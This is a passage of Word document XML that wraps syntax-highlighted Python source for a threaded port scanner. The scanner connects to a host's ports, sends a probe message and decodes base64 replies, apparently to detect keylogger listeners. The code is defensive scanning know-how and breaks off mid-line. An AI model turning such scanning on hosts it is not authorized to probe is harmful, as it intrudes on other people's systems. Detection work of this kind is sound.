    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">136  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">137  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">138  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Scan a host (ip), for open ports in port_list. Sends a message to host and wait response to identify Keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">139  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Can activate more verbosity for errors and control messages, and define a timeout for connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">140  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>Host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141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ip</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142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143  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">open_ports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">144  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port_list                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># All ports can be self.ports = range(1, 0xffff + 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">145  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">ip                                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># ip to scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">146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147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148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149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 - alternative: socket.setdefaulttimeout(timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">150  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">wait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">waitresponse                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># wait response after send message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">151  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">()                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># thread lock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">152  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">153  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">154  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_threads_launched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_current_threads_running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>max_concurrent_threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>keyloggers_found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">155  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">156  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Increment running threads counter and max concurrent threads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">157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158  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_threads_launched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">159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160  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_current_threads_running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>max_concurrent_threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">161  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">max_concurrent_threads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_current_threads_running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">162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163  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">164  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">165  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">s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 xml:space="preserve">)       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># ipv4 (AF_INET) tcp (SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">166  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>settimeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">)                                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Sets timeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">167  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>((</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68  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">169  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">))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170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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">171  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Sending message %s to %s:%s ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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72  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>en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3  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">174  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>BUFFER_SIZE</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5  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Decode if Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">176  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">177  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>b64decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
